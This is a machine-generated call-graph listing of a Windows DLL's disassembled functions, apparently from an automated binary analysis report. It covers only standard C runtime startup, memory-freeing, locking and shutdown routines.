___std_exception_copy 25 API calls 10310->10312 10311->10310 10312->10309 10313->10298 10315 6e4ea767 10314->10315 10316 6e4ea79b 10314->10316 10315->9972 10317 6e4ea7b2 10316->10317 10318 6e4eb90f _free 14 API calls 10316->10318 10319 6e4eb90f _free 14 API calls 10317->10319 10318->10316 10319->10315 8967 6e4e7062 8968 6e4e706b 8967->8968 8969 6e4e7070 8967->8969 8984 6e4e7445 8968->8984 8973 6e4e6f2c 8969->8973 8974 6e4e6f38 CallCatchBlock 8973->8974 8975 6e4e6f61 dllmain_raw 8974->8975 8980 6e4e6f5c __DllMainCRTStartup@12 8974->8980 8981 6e4e6f47 8974->8981 8976 6e4e6f7b dllmain_crt_dispatch 8975->8976 8975->8981 8976->8980 8976->8981 8977 6e4e6fcd 8978 6e4e6fd6 dllmain_crt_dispatch 8977->8978 8977->8981 8979 6e4e6fe9 dllmain_raw 8978->8979 8978->8981 8979->8981 8980->8977 8988 6e4e6e7a 8980->8988 8983 6e4e6fc2 dllmain_raw 8983->8977 8985 6e4e745b 8984->8985 8987 6e4e7464 8985->8987 9302 6e4e73f8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8985->9302 8987->8969 8990 6e4e6e86 CallCatchBlock __DllMainCRTStartup@12 8988->8990 8989 6e4e6e8f 8989->8983 8990->8989 8991 6e4e6eb7 8990->8991 8992 6e4e6f22 8990->8992 9011 6e4e690f 8991->9011 9032 6e4e7288 IsProcessorFeaturePresent 8992->9032 8995 6e4e6ebc 9020 6e4e749c 8995->9020 8997 6e4e6f29 CallCatchBlock 8998 6e4e6f61 dllmain_raw 8997->8998 9007 6e4e6f5c __DllMainCRTStartup@12 8997->9007 9008 6e4e6f47 8997->9008 9000 6e4e6f7b dllmain_crt_dispatch 8998->9000 8998->9008 8999 6e4e6ec1 __RTC_Initialize __DllMainCRTStartup@12 9023 6e4e6ab0 8999->9023 9000->9007 9000->9008 9004 6e4e6fcd 9005 6e4e6fd6 dllmain_crt_dispatch 9004->9005 9004->9008 9006 6e4e6fe9 dllmain_raw 9005->9006 9005->9008 9006->9008 9007->9004 9009 6e4e6e7a __DllMainCRTStartup@12 79 API calls 9007->9009 9008->8983 9010 6e4e6fc2 dllmain_raw 9009->9010 9010->9004 9012 6e4e6914 ___scrt_release_startup_lock 9011->9012 9013 6e4e6918 9012->9013 9016 6e4e6924 __DllMainCRTStartup@12 9012->9016 9036 6e4eab46 9013->9036 9017 6e4e6931 9016->9017 9039 6e4ea1f0 9016->9039 9017->8995 9174 6e4e7f06 InterlockedFlushSList 9020->9174 9024 6e4e6abc 9023->9024 9025 6e4e6ad2 9024->9025 9181 6e4eacf2 9024->9181 9029 6e4e6f1c 9025->9029 9027 6e4e6aca 9186 6e4e7baf 9027->9186 9285 6e4e6932 9029->9285 9033 6e4e729e __CreateFrameInfo 9032->9033 9034 6e4e7349 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9033->9034 9035 6e4e7394 __CreateFrameInfo 9034->9035 9035->8997 9050 6e4ea858 9036->9050 9040 6e4ea1fe 9039->9040 9041 6e4ea20f 9039->9041 9121 6e4ea296 GetModuleHandleW 9040->9121 9128 6e4ea0b6 9041->9128 9046 6e4ea249 9046->8995 9051 6e4ea864 CallCatchBlock 9050->9051 9058 6e4eb7d4 EnterCriticalSection 9051->9058 9053 6e4ea872 9059 6e4eaa56 9053->9059 9058->9053 9060 6e4ea87f 9059->9060 9061 6e4eaa75 9059->9061 9063 6e4ea8a7 9060->9063 9061->9060 9066 6e4eb90f 9061->9066 9120 6e4eb81c LeaveCriticalSection 9063->9120 9065 6e4e6922 9065->8995 9067 6e4eb91a HeapFree 9066->9067 9071 6e4eb943 __dosmaperr 9066->9071 9068 6e4eb92f 9067->9068 9067->9071 9072 6e4eb686 9068->9072 9071->9060 9075 6e4eb423 GetLastError 9072->9075 9074 6e4eb68b GetLastError 9074->9071 9076 6e4eb43a 9075->9076 9077 6e4eb440 9075->9077 9110 6e4ed05d 9076->9110 9094 6e4eb446 SetLastError 9077->9094 9098 6e4ed09c 9077->9098 9084 6e4eb48d 9087 6e4ed09c __dosmaperr 6 API calls 9084->9087 9085 6e4eb476 9086 6e4ed09c __dosmaperr 6 API calls 9085->9086 9095 6e4eb484 9086->9095 9088 6e4eb499 9087->9088 9089 6e4eb4ae 9088->9089 9090 6e4eb49d 9088->9090 9115 6e4eb0ce 9089->9115 9092 6e4ed09c __dosmaperr 6 API calls 9090->9092 9091 6e4eb90f _free 12 API calls 9091->9094 9092->9095 9094->9074 9095->9091 9097 6e4eb90f _free 12 API calls 9097->9094 9099 6e4ecefd __dosmaperr 5 API calls 9098->9099 9100 6e4ed0b8 9099->9100 9101 6e4ed0d6 TlsSetValue 9100->9101 9102 6e4eb45e 9100->9102 9102->9094 9103 6e4eb8b2 9102->9103 9104 6e4eb8bf __dosmaperr 9103->9104 9105 6e4eb8ff 9104->9105 9106 6e4eb8ea RtlAllocateHeap 9104->9106 9109 6e4e9eaa __dosmaperr EnterCriticalSection LeaveCriticalSection 9104->9109 9107 6e4eb686 __dosmaperr 13 API calls 9105->9107 9106->9104 9108 6e4eb46e 9106->9108 9107->9108 9108->9084 9108->9085 9109->9104 9111 6e4ecefd __dosmaperr 5 API calls 9110->9111 9112 6e4ed079 9111->9112 9113 6e4ed094 TlsGetValue 9112->9113 9114 6e4ed082 9112->9114 9114->9077 9116 6e4eaf62 __dosmaperr EnterCriticalSection LeaveCriticalSection 9115->9116 9117 6e4eb13c 9116->9117 9118 6e4eb074 __dosmaperr 14 API calls 9117->9118 9119 6e4eb165 9118->9119 9119->9097 9120->9065 9122 6e4ea203 9121->9122 9122->9041 9123 6e4ea2d9 GetModuleHandleExW 9122->9123 9124 6e4ea2f8 GetProcAddress 9123->9124 9127 6e4ea30d 9123->9127 9124->9127 9125 6e4ea32a 9125->9041 9126 6e4ea321 FreeLibrary 9126->9125 9127->9125 9127->9126 9129 6e4ea0c2 CallCatchBlock 9128->9129 9144 6e4eb7d4 EnterCriticalSection 9129->9144 9131 6e4ea0cc 9145 6e4ea103 9131->9145 9133 6e4ea0d9 9149 6e4ea0f7 9133->9149 9136 6e4ea254 9153 6e4eb881 GetPEB 9136->9153 9139 6e4ea283 9141 6e4ea2d9 __CreateFrameInfo 3 API calls 9139->9141 9140 6e4ea263 GetPEB 9140->9139 9142 6e4ea273 GetCurrentProcess TerminateProcess 9140->9142 9143 6e4ea28b ExitProcess 9141->9143 9142->9139 9144->9131 9146 6e4ea10f CallCatchBlock 9145->9146 9147 6e4ea170 __CreateFrameInfo 9146->9147 9148 6e4eab46 __DllMainCRTStartup@12 14 API calls 9146->9148 9147->9133 9148->9147 9152 6e4eb81c LeaveCriticalSection 9149->9152 9151 6e4ea0e5 9151->9046 9151->9136 9152->9151 9154 6e4ea25e 9153->9154 9155 6e4eb89b 9153->9155 9154->9139 9154->9140 9157 6e4ecf80 9155->9157 9160 6e4ecefd 9157->9160 9161 6e4ecf2b 9160->9161 9165 6e4ecf27 9160->9165 9161->9165 9167 6e4ece36 9161->9167 9164 6e4ecf45 GetProcAddress 9164->9165 9166 6e4ecf55 __dosmaperr 9164->9166 9165->9154 9166->9165 9168 6e4ece47 ___vcrt_InitializeCriticalSectionEx 9167->9168 9169 6e4ece65 LoadLibraryExW 9168->9169 9171 6e4ecedb FreeLibrary 9168->9171 9172 6e4ecef2 9168->9172 9173 6e4eceb3 LoadLibraryExW 9168->9173 9169->9168 9170 6e4ece80 GetLastError 9169->9170 9170->9168 9171->9168 9172->9164 9172->9165 9173->9168 9175 6e4e7f16 9174->9175 9176 6e4e74a6 9174->9176 9175->9176 9178 6e4eada7 9175->9178 9176->8999 9179 6e4eb90f _free 14 API calls 9178->9179 9180 6e4eadbf 9179->9180 9180->9175 9182 6e4ead0f ___scrt_uninitialize_crt 9181->9182 9183 6e4eacfd 9181->9183 9182->9027 9184 6e4ead0b 9183->9184 9192 6e4edaab 9183->9192 9184->9027 9187 6e4e7bb8 9186->9187 9188 6e4e7bc2 9186->9188 9258 6e4e804e 9187->9258 9188->9025 9195 6e4ed959 9192->9195 9198 6e4ed8ad 9195->9198 9199 6e4ed8b9 CallCatchBlock 9198->9199 9206 6e4eb7d4 EnterCriticalSection 9199->9206 9201 6e4ed92f 9215 6e4ed94d 9201->9215 9204 6e4ed8c3 ___scrt_uninitialize_crt 9204->9201 9207 6e4ed821 9204->9207 9206->9204 9208 6e4ed82d CallCatchBlock 9207->9208 9218 6e4edbc8 EnterCriticalSection 9208->9218 9210 6e4ed837 ___scrt_uninitialize_crt 9211 6e4ed870 9210->9211 9219 6e4eda63 9210->9219 9229 6e4ed8a1 9211->9229 9257 6e4eb81c LeaveCriticalSection 9215->9257 9217 6e4ed93b 9217->9184 9218->9210 9220 6e4eda79 9219->9220 9221 6e4eda70 9219->9221 9232 6e4ed9fe 9220->9232 9222 6e4ed959 ___scrt_uninitialize_crt 66 API calls 9221->9222 9225 6e4eda76 9222->9225 9225->9211 9227 6e4eda95 9245 6e4ef1df 9227->9245 9256 6e4edbdc LeaveCriticalSection 9229->9256 9231 6e4ed88f 9231->9204 9233 6e4eda16 9232->9233 9237 6e4eda3b 9232->9237 9234 6e4edd4c ___scrt_uninitialize_crt 25 API calls 9233->9234 9233->9237 9235 6e4eda34 9234->9235 9236 6e4ef9d7 ___scrt_uninitialize_crt 62 API calls 9235->9236 9236->9237 9237->9225 9238 6e4edd4c 9237->9238 9239 6e4edd6d 9238->9239 9240 6e4edd58 9238->9240 9239->9227 9241 6e4eb686 __dosmaperr 14 API calls 9240->9241 9242 6e4edd5d 9241->9242 9243 6e4e99cc ___std_exception_copy 25 API calls 9242->9243 9244 6e4edd68 9243->9244 9244->9227 9246 6e4ef1f0 9245->9246 9250 6e4ef1fd 9245->9250 9247 6e4eb686 __dosmaperr 14 API calls 9246->9247 9252 6e4ef1f5 9247->9252 9248 6e4ef246 9249 6e4eb686 __dosmaperr 14 API calls 9248->9249 9251 6e4ef24b 9249->9251 9250->9248 9253 6e4ef224 9250->9253 9254 6e4e99cc ___std_exception_copy 25 API calls 9251->9254 9252->9225 9255 6e4ef13d ___scrt_uninitialize_crt 29 API calls 9253->9255 9254->9252 9255->9252 9256->9231 9257->9217 9259 6e4e8058 9258->9259 9260 6e4e7bbd 9258->9260 9266 6e4e9115 9259->9266 9262 6e4e8e58 9260->9262 9263 6e4e8e82 9262->9263 9264 6e4e8e63 9262->9264 9263->9188 9265 6e4e8e6d DeleteCriticalSection 9264->9265 9265->9263 9265->9265 9271 6e4e9091 9266->9271 9269 6e4e9147 TlsFree 9270 6e4e913b 9269->9270 9270->9260 9272 6e4e90cc 9271->9272 9273 6e4e90a9 9271->9273 9272->9269 9272->9270 9273->9272 9277 6e4e8ff7 9273->9277 9276 6e4e90be GetProcAddress 9276->9272 9282 6e4e9003 ___vcrt_InitializeCriticalSectionEx 9277->9282 9278 6e4e9077 9278->9272 9278->9276 9279 6e4e9019 LoadLibraryExW 9280 6e4e907e 9279->9280 9281 6e4e9037 GetLastError 9279->9281 9280->9278 9283 6e4e9086 FreeLibrary 9280->9283 9281->9282 9282->9278 9282->9279 9284 6e4e9059 LoadLibraryExW 9282->9284 9283->9278 9284->9280 9284->9282 9290 6e4ead22 9285->9290 9288 6e4e804e ___vcrt_uninitialize_ptd 6 API calls 9289 6e4e6f21 9288->9289 9289->8989 9293 6e4eb504 9290->9293 9294 6e4eb50e 9293->9294 9296 6e4e6939 9293->9296 9297 6e4ed01e 9294->9297 9296->9288 9298 6e4ecefd __dosmaperr 5 API calls 9297->9298 9299 6e4ed03a 9298->9299 9300 6e4ed055 TlsFree 9299->9300 9301 6e4ed043 9299->9301 9301->9296 9302->8987 10592 6e4e5a10 10593 6e4e5a64 10592->10593 10594 6e4e5a40 10592->10594 10599 6e4e5ed0 10593->10599 10596 6e4e5d90 36 API calls 10594->10596 10598 6e4e5a5a 10596->10598 10602 6e4e6771 10599->10602 10607 6e4e6705 10602->10607 10605 6e4e7b0e Concurrency::cancel_current_task RaiseException 10606 6e4e6790 10605->10606 10608 6e4e6660 std::exception::exception 25 API calls 10607->10608 10609 6e4e6717 10608->10609 10609->10605 9303 6e4eb423 GetLastError 9304 6e4eb43a 9303->9304 9305 6e4eb440 9303->9305 9306 6e4ed05d __dosmaperr 6 API calls 9304->9306 9307 6e4ed09c __dosmaperr 6 API calls 9305->9307 9322 6e4eb446 SetLastError 9305->9322 9306->9305 9308 6e4eb45e 9307->9308 9309 6e4eb8b2 __dosmaperr 12 API calls 9308->9309 9308->9322 9310 6e4eb46e 9309->9310 9312 6e4eb48d 9310->9312 9313 6e4eb476 9310->9313 9315 6e4ed09c __dosmaperr 6 API calls 9312->9315 9314 6e4ed09c __dosmaperr 6 API calls 9313->9314 9323 6e4eb484 9314->9323 9316 6e4eb499 9315->9316 9317 6e4eb4ae 9316->9317 9318 6e4eb49d 9316->9318 9321 6e4eb0ce __dosmaperr 12 API calls 9317->9321 9320 6e4ed09c __dosmaperr 6 API calls 9318->9320 9319 6e4eb90f _free 12 API calls 9319->9322 9320->9323 9324 6e4eb4b9 9321->9324 9323->9319 9325 6e4eb90f _free 12 API calls 9324->9325 9325->9322 11018 6e4eb76c 11021 6e4eb6f3 11018->11021 11022 6e4eb6ff CallCatchBlock 11021->11022 11029 6e4eb7d4 EnterCriticalSection 11022->11029 11024 6e4eb709 11025 6e4eb737 11024->11025 11028 6e4ee0bd __fassign 14 API calls 11024->11028 11030 6e4eb755 11025->11030 11028->11024 11029->11024 11033 6e4eb81c LeaveCriticalSection 11030->11033 11032 6e4eb743 11033->11032 11120 6e4edb7c 11121 6e4edaab ___scrt_uninitialize_crt 66 API calls 11120->11121 11122 6e4edb84 11121->11122 11130 6e4efca3 11122->11130 11124 6e4edb89 11140 6e4efd4e 11124->11140 11127 6e4edbb3 11128 6e4eb90f _free 14 API calls 11127->11128 11129 6e4edbbe 11128->11129 11131 6e4efcaf CallCatchBlock 11130->11131 11144 6e4eb7d4 EnterCriticalSection 11131->11144 11133 6e4efd26 11158 6e4efd45 11133->11158 11136 6e4efcfa DeleteCriticalSection 11138 6e4eb90f _free 14 API calls 11136->11138 11139 6e4efcba 11138->11139 11139->11133 11139->11136 11145 6e4f0155 11139->11145 11141 6e4edb98 DeleteCriticalSection 11140->11141 11142 6e4efd65 11140->11142 11141->11124 11141->11127 11142->11141 11143 6e4eb90f _free 14 API calls 11142->11143 11143->11141 11144->11139 11146 6e4f0161 CallCatchBlock 11145->11146 11147 6e4f016b 11146->11147 11148 6e4f0180 11146->11148 11149 6e4eb686 __dosmaperr 14 API calls 11147->11149 11154 6e4f017b 11148->11154 11161 6e4edbc8 EnterCriticalSection 11148->11161 11150 6e4f0170 11149->11150 11152 6e4e99cc ___std_exception_copy 25 API calls 11150->11152 11152->11154 11153 6e4f019d 11162 6e4f00de 11153->11162 11154->11139 11156 6e4f01a8 11178 6e4f01cf 11156->11178 11250 6e4eb81c LeaveCriticalSection 11158->11250 11160 6e4efd32 11160->11124 11161->11153 11163 6e4f00eb 11162->11163 11164 6e4f0100 11162->11164 11165 6e4eb686 __dosmaperr 14 API calls 11163->11165 11166 6e4ed9fe ___scrt_uninitialize_crt 62 API calls 11164->11166 11176 6e4f00fb 11164->11176 11167 6e4f00f0 11165->11167 11169 6e4f0115 11166->11169 11168 6e4e99cc ___std_exception_copy 25 API calls 11167->11168 11168->11176 11170 6e4efd4e 14 API calls 11169->11170 11171 6e4f011d 11170->11171 11172 6e4edd4c ___scrt_uninitialize_crt 25 API calls 11171->11172 11173 6e4f0123 11172->11173 11181 6e4f0747 11173->11181 11176->11156 11177 6e4eb90f _free 14 API calls 11177->11176 11249 6e4edbdc LeaveCriticalSection 11178->11249 11180 6e4f01d7 11180->11154 11182 6e4f076d 11181->11182 11183 6e4f0758 11181->11183 11184 6e4f07b6 11182->11184 11188 6e4f0794 11182->11188 11185 6e4eb673 __dosmaperr 14 API calls 11183->11185 11186 6e4eb673 __dosmaperr 14 API calls 11184->11186 11187 6e4f075d 11185->11187 11189 6e4f07bb 11186->11189 11190 6e4eb686 __dosmaperr 14 API calls 11187->11190 11196 6e4f06bb 11188->11196 11192 6e4eb686 __dosmaperr 14 API calls 11189->11192 11193 6e4f0129 11190->11193 11194 6e4f07c3 11192->11194 11193->11176 11193->11177 11195 6e4e99cc ___std_exception_copy 25 API calls 11194->11195 11195->11193 11197 6e4f06c7 CallCatchBlock 11196->11197 11207 6e4eeffc EnterCriticalSection 11197->11207 11199 6e4f06d5 11200 6e4f06fc 11199->11200 11201 6e4f0707 11199->11201 11208 6e4f07d4 11200->11208 11203 6e4eb686 __dosmaperr 14 API calls 11201->11203 11204 6e4f0702 11203->11204 11223 6e4f073b 11204->11223 11207->11199 11226 6e4ef0d3 11208->11226 11210 6e4f07ea 11239 6e4ef042 11210->11239 11211 6e4f07e4 11211->11210 11213 6e4f081c 11211->11213 11216 6e4ef0d3 ___scrt_uninitialize_crt 25 API calls 11211->11216 11213->11210 11214 6e4ef0d3 ___scrt_uninitialize_crt 25 API calls 11213->11214 11217 6e4f0828 CloseHandle 11214->11217 11219 6e4f0813 11216->11219 11217->11210 11220 6e4f0834 GetLastError 11217->11220 11218 6e4f0864 11218->11204 11222 6e4ef0d3 ___scrt_uninitialize_crt 25 API calls 11219->11222 11220->11210 11221 6e4eb650 __dosmaperr 14 API calls 11221->11218 11222->11213 11248 6e4ef01f LeaveCriticalSection 11223->11248 11225 6e4f0724 11225->11193 11227 6e4ef0f5 11226->11227 11228 6e4ef0e0 11226->11228 11231 6e4eb673 __dosmaperr 14 API calls 11227->11231 11233 6e4ef11a 11227->11233 11229 6e4eb673 __dosmaperr 14 API calls 11228->11229 11230 6e4ef0e5 11229->11230 11232 6e4eb686 __dosmaperr 14 API calls 11230->11232 11234 6e4ef125 11231->11234 11235 6e4ef0ed 11232->11235 11233->11211 11236 6e4eb686 __dosmaperr 14 API calls 11234->11236 11235->11211 11237 6e4ef12d 11236->11237 11238 6e4e99cc ___std_exception_copy 25 API calls 11237->11238 11238->11235 11240 6e4ef0b8 11239->11240 11241 6e4ef051 11239->11241 11242 6e4eb686 __dosmaperr 14 API calls 11240->11242 11241->11240 11246 6e4ef07b 11241->11246 11243 6e4ef0bd 11242->11243 11244 6e4eb673 __dosmaperr 14 API calls 11243->11244 11245 6e4ef0a8 11244->11245 11245->11218 11245->11221 11246->11245 11247 6e4ef0a2 SetStdHandle 11246->11247 11247->11245 11248->11225 11249->11180 11250->11160 9326 6e4e6d20 9327 6e4e6d5e 9326->9327 9328 6e4e6d2b 9326->9328 9329 6e4e6e7a __DllMainCRTStartup@12 84 API calls 9327->9329 9330 6e4e6d50 9328->9330 9331 6e4e6d30 9328->9331 9335 6e4e6d3a 9329->9335 9338 6e4e6d73 9330->9338 9333 6e4e6d46 9331->9333 9334 6e4e6d35 9331->9334 9357 6e4e68af 9333->9357 9334->9335 9352 6e4e68ce 9334->9352 9339 6e4e6d7f CallCatchBlock 9338->9339 9365 6e4e693f 9339->9365 9341 6e4e6de9 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 9341->9335 9342 6e4e6d86 __DllMainCRTStartup@12 9342->9341 9343 6e4e6dad 9342->9343 9344 6e4e6e72 9342->9344 9376 6e4e68a1 9343->9376 9346 6e4e7288 __DllMainCRTStartup@12 4 API calls 9344->9346 9347 6e4e6e79 9346->9347 9348 6e4e6dbc __RTC_Initialize 9348->9341 9379 6e4e7490 InitializeSListHead 9348->9379 9350 6e4e6dca 9350->9341 9380 6e4e6876 9350->9380 9515 6e4eacea 9352->9515 9718 6e4e7b99 9357->9718 9360 6e4e68b8 9360->9335 9363 6e4e68cb 9363->9335 9364 6e4e7ba4 21 API calls 9364->9360 9366 6e4e6948 9365->9366 9384 6e4e70a7 IsProcessorFeaturePresent 9366->9384 9370 6e4e6959 9375 6e4e695d 9370->9375 9394 6e4eaccd 9370->9394 9373 6e4e6974 9373->9342 9374 6e4e7baf ___scrt_uninitialize_crt 7 API calls 9374->9375 9375->9342 9509 6e4e6978 9376->9509 9378 6e4e68a8 9378->9348 9379->9350 9381 6e4e687b ___scrt_release_startup_lock 9380->9381 9382 6e4e70a7 IsProcessorFeaturePresent 9381->9382 9383 6e4e6884 9381->9383 9382->9383 9383->9341 9385 6e4e6954 9384->9385 9386 6e4e7b7a 9385->9386 9397 6e4e8e1c 9386->9397 9389 6e4e7b83 9389->9370 9391 6e4e7b8b 9392 6e4e7b96 9391->9392 9393 6e4e8e58 ___vcrt_uninitialize_locks DeleteCriticalSection 9391->9393 9392->9370 9393->9389 9426 6e4ed429 9394->9426 9398 6e4e8e25 9397->9398 9400 6e4e8e4e 9398->9400 9401 6e4e7b7f 9398->9401 9411 6e4e91c9 9398->9411 9402 6e4e8e58 ___vcrt_uninitialize_locks DeleteCriticalSection 9400->9402 9401->9389 9403 6e4e801b 9401->9403 9402->9401 9416 6e4e90da 9403->9416 9406 6e4e8030 9406->9391 9409 6e4e804b 9409->9391 9410 6e4e804e ___vcrt_uninitialize_ptd 6 API calls 9410->9406 9412 6e4e9091 ___vcrt_InitializeCriticalSectionEx 5 API calls 9411->9412 9413 6e4e91e3 9412->9413 9414 6e4e9201 InitializeCriticalSectionAndSpinCount 9413->9414 9415 6e4e91ec 9413->9415 9414->9415 9415->9398 9417 6e4e9091 ___vcrt_InitializeCriticalSectionEx 5 API calls 9416->9417 9418 6e4e90f4 9417->9418 9419 6e4e910d TlsAlloc 9418->9419 9420 6e4e8025 9418->9420 9420->9406 9421 6e4e918b 9420->9421 9422 6e4e9091 ___vcrt_InitializeCriticalSectionEx 5 API calls 9421->9422 9423 6e4e91a5 9422->9423 9424 6e4e91c0 TlsSetValue 9423->9424 9425 6e4e803e 9423->9425 9424->9425 9425->9409 9425->9410 9427 6e4ed439 9426->9427 9428 6e4e6966 9426->9428 9427->9428 9430 6e4ed39d 9427->9430 9428->9373 9428->9374 9431 6e4ed3a9 CallCatchBlock 9430->9431 9442 6e4eb7d4 EnterCriticalSection 9431->9442 9433 6e4ed3b0 9443 6e4eef5e 9433->9443 9441 6e4ed3ce 9467 6e4ed3f4 9441->9467 9442->9433 9444 6e4eef6a CallCatchBlock 9443->9444 9445 6e4eef94 9444->9445 9446 6e4eef73 9444->9446 9470 6e4eb7d4 EnterCriticalSection 9445->9470 9447 6e4eb686 __dosmaperr 14 API calls 9446->9447 9449 6e4eef78 9447->9449 9478 6e4e99cc 9449->9478 9452 6e4ed3bf 9452->9441 9456 6e4ed233 GetStartupInfoW 9452->9456 9454 6e4eefcc 9481 6e4eeff3 9454->9481 9455 6e4eefa0 9455->9454 9471 6e4eeeae 9455->9471 9457 6e4ed2e4 9456->9457 9458 6e4ed250 9456->9458 9462 6e4ed2e9 9457->9462 9458->9457 9459 6e4eef5e 26 API calls 9458->9459 9460 6e4ed278 9459->9460 9460->9457 9461 6e4ed2a8 GetFileType 9460->9461 9461->9460 9463 6e4ed2f0 9462->9463 9464 6e4ed333 GetStdHandle 9463->9464 9465 6e4ed399 9463->9465 9466 6e4ed346 GetFileType 9463->9466 9464->9463 9465->9441 9466->9463 9508 6e4eb81c LeaveCriticalSection 9467->9508 9469 6e4ed3df 9469->9427 9470->9455 9472 6e4eb8b2 __dosmaperr 14 API calls 9471->9472 9477 6e4eeec0 9472->9477 9473 6e4eeecd 9474 6e4eb90f _free 14 API calls 9473->9474 9475 6e4eef22 9474->9475 9475->9455 9477->9473 9484 6e4ed0de 9477->9484 9489 6e4e9968 9478->9489 9480 6e4e99d8 9480->9452 9507 6e4eb81c LeaveCriticalSection 9481->9507 9483 6e4eeffa 9483->9452 9485 6e4ecefd __dosmaperr 5 API calls 9484->9485 9486 6e4ed0fa 9485->9486 9487 6e4ed118 InitializeCriticalSectionAndSpinCount 9486->9487 9488 6e4ed103 9486->9488 9487->9488 9488->9477 9490 6e4eb423 __dosmaperr 14 API calls 9489->9490 9491 6e4e9973 9490->9491 9494 6e4e9981 9491->9494 9497 6e4e99f9 IsProcessorFeaturePresent 9491->9497 9493 6e4e99cb 9495 6e4e9968 ___std_exception_copy 25 API calls 9493->9495 9494->9480 9496 6e4e99d8 9495->9496 9496->9480 9498 6e4e9a05 9497->9498 9501 6e4e9820 9498->9501 9502 6e4e983c __CreateFrameInfo 9501->9502 9503 6e4e9868 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9502->9503 9504 6e4e9939 __CreateFrameInfo 9503->9504 9505 6e4e6791 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9504->9505 9506 6e4e9957 GetCurrentProcess TerminateProcess 9505->9506 9506->9493 9507->9483 9508->9469 9510 6e4e6988 9509->9510 9511 6e4e6984 9509->9511 9512 6e4e7288 __DllMainCRTStartup@12 4 API calls 9510->9512 9514 6e4e6995 ___scrt_release_startup_lock 9510->9514 9511->9378 9513 6e4e69fe 9512->9513 9514->9378 9521 6e4eb2a0 9515->9521 9518 6e4e7ba4 9701 6e4e7f45 9518->9701 9522 6e4eb2aa 9521->9522 9525 6e4e68d3 9521->9525 9523 6e4ed05d __dosmaperr 6 API calls 9522->9523 9524 6e4eb2b1 9523->9524 9524->9525 9526 6e4ed09c __dosmaperr 6 API calls 9524->9526 9525->9518 9527 6e4eb2c4 9526->9527 9529 6e4eb167 9527->9529 9530 6e4eb182 9529->9530 9531 6e4eb172 9529->9531 9530->9525 9535 6e4eb188 9531->9535 9534 6e4eb90f _free 14 API calls 9534->9530 9536 6e4eb19d 9535->9536 9537 6e4eb1a3 9535->9537 9538 6e4eb90f _free 14 API calls 9536->9538 9539 6e4eb90f _free 14 API calls 9537->9539 9538->9537 9540 6e4eb1af 9539->9540 9541 6e4eb90f _free 14 API calls 9540->9541 9542 6e4eb1ba 9541->9542 9543 6e4eb90f _free 14 API calls 9542->9543 9544 6e4eb1c5 9543->9544 9545 6e4eb90f _free 14 API calls 9544->9545 9546 6e4eb1d0 9545->9546 9547 6e4eb90f _free 14 API calls 9546->9547 9548 6e4eb1db 9547->9548 9549 6e4eb90f _free 14 API calls 9548->9549 9550 6e4eb1e6 9549->9550 9551 6e4eb90f _free 14 API calls 9550->9551 9552 6e4eb1f1 9551->9552 9553 6e4eb90f _free 14 API calls 9552->9553 9554 6e4eb1fc 9553->9554 9555 6e4eb90f _free 14 API calls 9554->9555 9556 6e4eb20a 9555->9556 9561 6e4eafb4 9556->9561 9562 6e4eafc0 CallCatchBlock 9561->9562 9577 6e4eb7d4 EnterCriticalSection 9562->9577 9564 6e4eaff4 9578 6e4eb013 9564->9578 9566 6e4eafca 9566->9564 9568 6e4eb90f _free 14 API calls 9566->9568 9568->9564 9569 6e4eb01f 9570 6e4eb02b CallCatchBlock 9569->9570 9582 6e4eb7d4 EnterCriticalSection 9570->9582 9572 6e4eb035 9583 6e4eb255 9572->9583 9574 6e4eb048 9587 6e4eb068 9574->9587 9577->9566 9581 6e4eb81c LeaveCriticalSection 9578->9581 9580 6e4eb001 9580->9569 9581->9580 9582->9572 9584 6e4eb264 __fassign 9583->9584 9585 6e4eb28b __fassign 9583->9585 9584->9585 9590 6e4eddf0 9584->9590 9585->9574 9700 6e4eb81c LeaveCriticalSection 9587->9700 9589 6e4eb056 9589->9534 9591 6e4ede70 9590->9591 9596 6e4ede06 9590->9596 9593 6e4eb90f _free 14 API calls 9591->9593 9617 6e4edebe 9591->9617 9595 6e4ede92 9593->9595 9594 6e4ede39 9597 6e4ede5b 9594->9597 9604 6e4eb90f _free 14 API calls 9594->9604 9598 6e4eb90f _free 14 API calls 9595->9598 9596->9591 9596->9594 9599 6e4eb90f _free 14 API calls 9596->9599 9601 6e4eb90f _free 14 API calls 9597->9601 9600 6e4edea5 9598->9600 9603 6e4ede2e 9599->9603 9605 6e4eb90f _free 14 API calls 9600->9605 9606 6e4ede65 9601->9606 9602 6e4edf2c 9608 6e4eb90f _free 14 API calls 9602->9608 9618 6e4ee230 9603->9618 9611 6e4ede50 9604->9611 9612 6e4edeb3 9605->9612 9607 6e4eb90f _free 14 API calls 9606->9607 9607->9591 9613 6e4edf32 9608->9613 9609 6e4eb90f 14 API calls _free 9614 6e4edecc 9609->9614 9646 6e4ee32e 9611->9646 9616 6e4eb90f _free 14 API calls 9612->9616 9613->9585 9614->9602 9614->9609 9616->9617 9658 6e4edf61 9617->9658 9619 6e4ee32a 9618->9619 9620 6e4ee241 9618->9620 9619->9594 9621 6e4ee252 9620->9621 9622 6e4eb90f _free 14 API calls 9620->9622 9623 6e4ee264 9621->9623 9625 6e4eb90f _free 14 API calls 9621->9625 9622->9621 9624 6e4ee276 9623->9624 9626 6e4eb90f _free 14 API calls 9623->9626 9627 6e4ee288 9624->9627 9628 6e4eb90f _free 14 API calls 9624->9628 9625->9623 9626->9624 9629 6e4ee29a 9627->9629 9630 6e4eb90f _free 14 API calls 9627->9630 9628->9627 9631 6e4ee2ac 9629->9631 9633 6e4eb90f _free 14 API calls 9629->9633 9630->9629 9632 6e4ee2be 9631->9632 9634 6e4eb90f _free 14 API calls 9631->9634 9635 6e4ee2d0 9632->9635 9636 6e4eb90f _free 14 API calls 9632->9636 9633->9631 9634->9632 9637 6e4ee2e2 9635->9637 9638 6e4eb90f _free 14 API calls 9635->9638 9636->9635 9639 6e4ee2f4 9637->9639 9641 6e4eb90f _free 14 API calls 9637->9641 9638->9637 9640 6e4ee306 9639->9640 9642 6e4eb90f _free 14 API calls 9639->9642 9643 6e4ee318 9640->9643 9644 6e4eb90f _free 14 API calls 9640->9644 9641->9639 9642->9640 9643->9619 9645 6e4eb90f _free 14 API calls 9643->9645 